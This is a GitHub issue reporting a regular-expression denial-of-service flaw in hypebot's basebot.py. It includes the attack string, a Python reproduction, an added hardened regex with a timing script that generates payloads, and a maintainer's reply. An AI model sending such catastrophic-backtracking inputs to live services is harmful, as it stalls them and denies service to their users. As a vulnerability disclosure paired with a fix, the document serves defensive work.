google / hypebot

#HypeBotHype
Apache License 2.0

Vulnerable Regular Expression in hypebot #21

Open. yetingli opened 4 years ago

yetingli commented 4 years ago

Type of Issue: Potential Regex Denial of Service (ReDoS)

Description: The vulnerable regular expression is located in

https://github.com/google/hypebot/blob/dd500026438af2d1154c26ba0201fa22e4c3280e/hypebot/basebot.py#L248

The ReDoS vulnerability can be exploited with the following string $(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!

You can execute the following code to reproduce ReDoS

    import re
    from time import perf_counter

    # Pattern from hypebot/basebot.py; a raw string so the backslashes reach
    # the regex engine unchanged instead of triggering invalid-escape warnings.
    REGEX = re.compile(r'\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')
    # Many quoted pairs and no closing parenthesis: the search has to backtrack
    # through every way of pairing the quotes before it can fail.
    ATTACK = '$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!'
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    print(REGEX.search(ATTACK))  # returns None, but only after a very long time
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")

I think you can limit the input length or modify this regex.
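
Added example, not part of the report above and not hypebot's code: a Python script that places the regex quoted from basebot.py beside an unambiguous rewrite, adds the input-length cap the report suggests, and times both patterns on payloads shaped like the one in the report. The `HARDENED` pattern is my assumed fix, not the project's; `MAX_INPUT_LEN`, the helper names, and the sample inputs are assumptions as well.

```python
import re
from time import perf_counter

# Pattern from hypebot/basebot.py as quoted in the report, unchanged.
# [^\(\)]* and .*? can both consume the same quote characters, so a string
# with many quotes and no closing ')' forces the engine to try every way of
# pairing them up before the search can fail.
VULNERABLE = re.compile(r'\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')

# Assumed hardened rewrite (not the project's own fix). Inside $(...) each
# repetition consumes either one character that is neither a paren nor a
# quote, or one complete double-quoted string (which may contain parens).
# The two branches start with different characters, so any input can be
# consumed in exactly one way and a failing search backs off linearly.
# Behaviour change: an unpaired quote inside $(...) no longer matches.
HARDENED = re.compile(r'\$\(((?:[^()"]|"[^"]*")+)\)')

# Assumed cap on text handed to the regex; defence in depth only. The
# report's payload is short enough to pass any reasonable cap, so a cap by
# itself does not rescue VULNERABLE.
MAX_INPUT_LEN = 512


def extract_command(pattern, text, max_len=MAX_INPUT_LEN):
    """Return the body of the first $(...) in text, or None.

    Oversized input is refused before the regex ever runs.
    """
    if len(text) > max_len:
        return None
    match = pattern.search(text)
    return match.group(1) if match else None


def attack_string(pairs):
    """Constructed payload in the report's shape: n '""' pairs and no ')'."""
    return '$(!!:' + ':'.join('""' for _ in range(pairs)) + '!'


def search_seconds(pattern, text):
    """Wall-clock seconds for one search, whatever the outcome."""
    start = perf_counter()
    pattern.search(text)
    return perf_counter() - start


if __name__ == '__main__':
    benign = 'hype $(roll "2d6 (twice)") please'   # constructed sample input
    print(extract_command(VULNERABLE, benign))
    print(extract_command(HARDENED, benign))

    # VULNERABLE's time grows exponentially with the number of quotes; keep
    # n small or the loop will not finish in any useful time.
    for n in (6, 8, 10):
        payload = attack_string(n)
        print(f'{n:2d} pairs: vulnerable {search_seconds(VULNERABLE, payload):.4f}s, '
              f'hardened {search_seconds(HARDENED, payload):.6f}s')

    # A payload as long as the report's is instant for the hardened pattern.
    print(f'40 pairs, hardened: {search_seconds(HARDENED, attack_string(40)):.6f}s')
```

The two patterns agree on ordinary commands, including quoted arguments that contain parentheses, but they differ on `$(a "b)`: the original accepts the unpaired quote and the rewrite rejects it, and that rejection is exactly what removes the ambiguity the payload exploits. The standard-library `re` module offers no match timeout, so the rewrite plus a length cap is the practical fix; the cap alone is not, because the attack input is short.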

brcooley commented 4 years ago

Thanks @yetingli for the report, I just wanted to follow-up here to let you know we're looking into fixing this issue now.